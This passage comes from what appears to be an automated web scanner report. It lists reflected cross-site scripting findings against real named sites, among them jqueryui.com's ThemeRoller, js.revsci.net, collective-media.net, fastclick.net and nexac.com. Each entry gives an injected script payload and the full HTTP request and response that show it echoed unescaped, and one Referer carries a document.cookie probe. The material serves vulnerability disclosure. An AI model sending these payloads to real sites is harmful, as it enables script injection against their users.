rHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdde2c17"><script>alert(1)</script>2ef784c42&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpaci
...[SNIP]...

4.167. http://jqueryui.com/themeroller/ [iconColorDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50c57"><script>alert(1)</script>7a42f2dba79 was submitted in the iconColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d550c57"><script>alert(1)</script>7a42f2dba79&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 24 Jan 2011 22:41:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
olorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d550c57"><script>alert(1)</script>7a42f2dba79&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityAct
...[SNIP]...

4.168. http://jqueryui.com/themeroller/ [iconColorHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6af50"><script>alert(1)</script>ead3b8dbb77 was submitted in the iconColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f36af50"><script>alert(1)</script>ead3b8dbb77&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 24 Jan 2011 22:40:19 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f36af50"><script>alert(1)</script>ead3b8dbb77&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&
...[SNIP]...

4.169. http://jqueryui.com/themeroller/ [iconColorHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6a1f"><script>alert(1)</script>4dddf997355 was submitted in the iconColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0a6a1f"><script>alert(1)</script>4dddf997355&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 24 Jan 2011 22:42:37 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
t=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0a6a1f"><script>alert(1)</script>4dddf997355&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgI
...[SNIP]...

4.170. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b042"><script>alert(1)</script>79a0a408cd7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?9b042"><script>alert(1)</script>79a0a408cd7=1 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 24 Jan 2011 22:38:52 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 117121

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&9b042"><script>alert(1)</script>79a0a408cd7=1" type="text/css" media="all" />
...[SNIP]...

4.171. http://js.revsci.net/gateway/gw.js [bpid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the bpid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 370cd'%3balert(1)//116a8eebeba was submitted in the bpid parameter. This input was echoed as 370cd';alert(1)//116a8eebeba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gateway/gw.js?csid=G07610&bpid=S024%204370cd'%3balert(1)//116a8eebeba HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.parenthood.com/?d1907'-alert(document.cookie)-'807a8eb3eff=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=TSeEzxMBEwoAABzXtKIAAAAt; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d55a964&0&&4d2fe81e&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d5ae6ff&0&&4d350f93&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d62d3e4&0&&4d3cf159&4c5cffb70704da9ab1f721e8ae18383d; udm_0=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; rsi_segs_1000000=pUPFekOFbwIUllNab/ezT+71tZc3ltU2c6Ot/evo4ZtovTXUVHSclqCxKr7OS2Tzwu4/ImKEN8BiOobyb3WUFAnv+oHe6qUcrWMruZg9+u2gfzq3cXL5QuB06QtfVNA8x1zeoA1Q4OW3y0hdHSsQb0Nq4ylOyx51VXuI7xeDLFEtKloAjPKQGJsHD2wp8shP4CizzpdqkyYnPP/VZgm2vL/HVZjLwI2vTVOuAtw0dbl8Nx7cbw9B+miy5yfK; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLuBa40HAV7DEFZEdMKVl168Ne30F1rgIMllRLOj2CnyxLwSlYtMGPNUFv6UJ75S2/PWs9VoKGAMaffRXZIcKsIfI0BwBDjCjZpjEC71nxlYizCu6A+lfGsvTCpuc5/BZCd8dAQtpSxRHzMi6uGYXwHdJ/d8IQUDaybNyCnRbnxo06dBQo6MP+y2flHvCWwRN8R9QUy/ewmRfIY0CQ7gY2Fz5GIodV599nhNMkQuVM5gmbrYq7x5I21/KffdTJpt7T0ZTSX1eK3qBIo7MivlBA41pJ1L7pGL/iJtvadgZSAkPC3F; rsi_us_1000000=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=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; Domain=.revsci.net; Expires=Wed, 25-Jan-2012 03:03:33 GMT; Path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=ISO-8859-1
Date: Tue, 25 Jan 2011 03:03:33 GMT
Content-Length: 6020

//Vermont-12.4.0-1012
var rsi_now= new Date();
var rsi_csid= 'G07610';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da){this._rsiaa=Da;this._rsiba
...[SNIP]...
>>18))+"%"+_rsiCa(0x80+(i>>12&0x3F))+"%"+_rsiCa(0x80+(i>>6&0x3F))+"%"+_rsiCa(0x80+(i&0x3F));}window[rsi_csid]=new rsiClient(rsi_csid);
if(window[rsi_csid])window[rsi_csid].DM_addEncToLoc("bpid",'S024 4370cd';alert(1)//116a8eebeba');else DM_addEncToLoc("bpid",'S024 4370cd';alert(1)//116a8eebeba');
function asi_addElem(e){var p=document.body==null?document.getElementsByTagName('head')[0]:document.body;p.insertBefore(e,p.firstChi
...[SNIP]...

4.172. http://js.revsci.net/gateway/gw.js [csid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload 5d167<script>alert(1)</script>44535fb0da9 was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=K044915d167<script>alert(1)</script>44535fb0da9 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.autobytel.com/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=TSeEzxMBEwoAABzXtKIAAAAt; udm_0=MLvv8iMJPj5n556Bo8jwxg27aVMsKvlZeh88v6LFxvi6NShB6ZO83AmHuP4JgK9bvgpJZgsqUaP2xfTnxNPh9+fmSEPkCVwJX705HIrDAdU6h9yhStmEjquZrguVeF3r0KH2OzLBVWAxUkwC4gAcARichgtw510EVacnhilf+8mRFAtdqKZBM6NUyjil0ZdVPRDqI+Ti+FIe6fewtlE9GinOst7C+rlOGLcLpjRwr3ZfMSayOJgkjwJdHiBSJ9kAcsoTnnNvaA7Xcb0oB88geiObO0gCWiOMGKuhN5NhpXa5wNJrUpjtCGmrVtVPNsrxL9ryWzajTucvw6SIgD8tYcWt49xZgaknzfQMm4nMuUr+qb1f+Ms3ek2Rc8bT/TWEYTevTxXB1YSJNhNpyO+5lLFTcDcxf+duWIK8eU0eIZAncGmWmIMN2HAprOXDL92vjPG5GfbTEfgpUERmJC38xypT/U/eZtb2YBNcle27OeZkVpQY88kycEdRsS0Ks4HLd9MJ6YiDUxLI3FUlyF0iCBOApuRiSn2zDur8XA1O6kZwXMP/vqnO/qlcm8YSMQteDyI8xTLOkrtw5XuzDTiehCDdIT5AUFXEVikG1xbWOf61/rLXUN710OVSlXuiKpp7slVOdtdIlvK5Ef2r/dR4A+dOCYr8QFU/PgPleGbyIL5+FSmkfzlkK9kpSlXIgokpHC3DmN7FSnZ4W681z5mM3+bkQyAQa1deCg6dY3j8xQBsPgkVRyyliBZ/BT5AfFB6Kt2bfoD+HZA9FOS08BLyiny5VyDBbEms9liC5Fs3TFj1lR+RyszTbus6ezqbVXF77t83kYCDwMJ+4srH8tO8ZoaqbVgfKSopwI144BcK1RceyhLfvKeO2mls6933wcTzEXOpWYxsjrgl5Q==; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d55a964&0&&4d2fe81e&4c5cffb70704da9ab1f721e8ae18383d; rsi_us_1000000=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; rsi_segs_1000000=pUPFfUnF7gMUVVNGyQq6Tc2UE03EygBbRXVdvuFY1BA6MUfyIuV86Lli0TAjp7vTbarnvaHN9T2ow1lTs80IFRatyDifWyk9mf1Kh7aRP1Ys1ciYX3r+3g5rrIF04H4FAiutUjgMss6NEqGMIeSYHxakEN/DRePx1bwHrbhXzJD91WqT8N1pQYXg+GpVj1vtVjK1+AiwL4ScNYq0oKT0cw==; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d5ae6ff&0&&4d350f93&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLuBa40HAV7DEFZEdMKVl168Ne30F2LgIMllRLOj2CnyxLwSlYtMGPNUFv6UJ75S23vXs9VpSODtSfbRXbKeKsIfm/9vVCVRHq5E9dPOyJm5LyxhQ0JLpdlLRkRi1AuT5G8QYh4GpDTxObx7HqsmwclpQmx8PITjRXvTVnlGDfiP+KG3TuYhIgfdoMdRUNcxsYfj/XLnOWpzH6FblA==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 24 Jan 2011 22:00:49 GMT
Cache-Control: max-age=86400, private
Expires: Tue, 25 Jan 2011 22:00:49 GMT
Content-Type: application/javascript;charset=ISO-8859-1
Date: Mon, 24 Jan 2011 22:00:48 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "K044915D167<SCRIPT>ALERT(1)</SCRIPT>44535FB0DA9" was not recognized.
*/

4.173. http://k.collective-media.net/cmadj/cm.martini/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://k.collective-media.net
Path:   /cmadj/cm.martini/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 62922'-alert(1)-'dfd10f1b18 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/cm.martini62922'-alert(1)-'dfd10f1b18/ HTTP/1.1
Host: k.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
Content-Length: 7074
Date: Tue, 25 Jan 2011 16:32:24 GMT
Connection: close
Set-Cookie: JY57=CT; expires=Tue, 22-Feb-2011 16:32:24 GMT; path=/; domain=.collective-media.net
Set-Cookie: cli=11de1c6a6c02b13; domain=collective-media.net; path=/; expires=Thu, 24-Jan-2013 16:32:24 GMT
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-39156217_1295973144","http://ad.doubleclick.net//cm.martini62922'-alert(1)-'dfd10f1b18/;net=cm;u=,cm-39156217_1295973144,11de1c6a6c02b13,none,;;contx=none;dc=w;btg=?","0","0",true);</scr'+'ipt>
...[SNIP]...

4.174. http://k.collective-media.net/cmadj/cm.martini/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://k.collective-media.net
Path:   /cmadj/cm.martini/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7ad2e'-alert(1)-'58bb6c4d169 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/cm.martini/?7ad2e'-alert(1)-'58bb6c4d169=1 HTTP/1.1
Host: k.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
Content-Length: 7078
Date: Tue, 25 Jan 2011 16:31:19 GMT
Connection: close
Set-Cookie: JY57=CT; expires=Tue, 22-Feb-2011 16:31:19 GMT; path=/; domain=.collective-media.net
Set-Cookie: cli=11de1c5a8d8c269; domain=collective-media.net; path=/; expires=Thu, 24-Jan-2013 16:31:19 GMT
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-59020176_1295973079","http://ad.doubleclick.net//cm.martini/?7ad2e'-alert(1)-'58bb6c4d169=1;net=cm;u=,cm-59020176_1295973079,11de1c5a8d8c269,none,;;contx=none;dc=w;btg=?","0","0",true);</scr'+'ipt>
...[SNIP]...

4.175. http://media.fastclick.net/w/win.bid [asite parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.fastclick.net
Path:   /w/win.bid

Issue detail

The value of the asite request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4105c"><script>alert(1)</script>e3d9cdcedea was submitted in the asite parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /w/win.bid?sid=54816&m=1&t=n&tp=5&d=f&mid=477674&EIC=1102509515205556&vch=554879014744&sys=3&evert=498003&vtid=14839&cb=1398482484&asite=20615019074105c"><script>alert(1)</script>e3d9cdcedea&txid=9eb0b645-887a-48fe-96d9-a8ec0d65be5c&UD=CQAA7FD8nj1AEQAAAID1_gM-GQAAACBWDx8-KAAwAQ&wp=TT4pUwACvIcK5XsjKRZgBOX45riQQ1x_qFMGTg&walsh=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBhNNGUyk-TYf5CqP2lQeEwNnIAqmp2NwBybvEzxX5pf__EQAQARgBIAA4AVCAx-HEBGDJhqOH1KOAEIIBF2NhLXB1Yi0xMTg5MzcwNDA4OTk4NTU1oAGb5-foA7IBDmpvb21sYWNvZGUub3JnugEJNzI4eDkwX2FzyAEJ2gEyaHR0cDovL2pvb21sYWNvZGUub3JnL2dmL3Byb2plY3Qvam9vbWxhL3JlcG9ydGluZy-YAgrAAgTIAr23iA7gAgDqAhdKb29tbGFfSm9vbWxhY29kZUZvb3RlcqgDAegD8gPoA6gG6AM16AO5AugD2gX1AwAAAET1AwIAAADgBAE%26num%3D1%26sig%3DAGiWqtxXfy71xAYmo2tqD6PMiVjHwATbrg%26client%3Dca-pub-1189370408998555%26adurl%3D HTTP/1.1
Host: media.fastclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: zru=1|:1294800534|; lxc=AgAAAASMFi1NACAABHVydDE3IAfgBAADMwAAluAUHwEAAA==; lyc=BQAAAARmvzBNACAAARhFIASgAAaUMwAANhwpYBcBvUSgFCAABA49AAAZ4AoXQAABiw7gCS8ADSAvwAABaVrACSAAAksAAA==; pluto=517004695355|v1

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 03:08:42 GMT
Content-Type: text/html
P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV'
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Length: 926
Set-Cookie: pjw=BAEAAAACIAMDiz4+TSAGAQABIAMEuuoDACcgBwLqSQcgBUATAQAA; domain=.fastclick.net; path=/; expires=Thu, 27-Jan-2011 03:08:42 GMT
Set-Cookie: vt=10070:256698:477674:54816:0:1295924922:3|; domain=.fastclick.net; path=/; expires=Thu, 24-Feb-2011 03:08:42 GMT
Set-Cookie: adv_ic=BwEAAAC6Pj5NIAYJAAFJAAAbWQAAJyALAwAAAAA=; domain=.fastclick.net; path=/; expires=Wed, 25-Jan-2012 03:08:42 GMT
Set-Cookie: pluto=517004695355|v1; domain=.fastclick.net; path=/; expires=Thu, 24-Jan-2013 03:08:42 GMT

<a href="http://media.fastclick.net/w/click.here?cid=256698&mid=477674&m=1&sid=54816&c=0&tp=5&exid=3&asite=20615019074105c"><script>alert(1)</script>e3d9cdcedea&vtid=14839&walsh=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBhNNGUyk-TYf5CqP2lQeEwNnIAqmp2NwBybvEzxX5pf__EQAQARgBIAA4AVCAx-HEBGDJhqOH1KOAEIIBF2NhLXB1Yi0xMTg5MzcwNDA4OTk4NTU1oAGb5-fo
...[SNIP]...

4.176. http://mig.nexac.com/2/B3DM/DLX/1@x96 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mig.nexac.com
Path:   /2/B3DM/DLX/1@x96

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a383e"><script>alert(1)</script>608b3697d30 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DMa383e"><script>alert(1)</script>608b3697d30/DLX/1@x96 HTTP/1.1
Host: mig.nexac.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/DLX/11596989115@x92?
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_tc=Y

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 03:06:51 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: OAX=rcHW800+PksAB3xJ; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.nexac.com
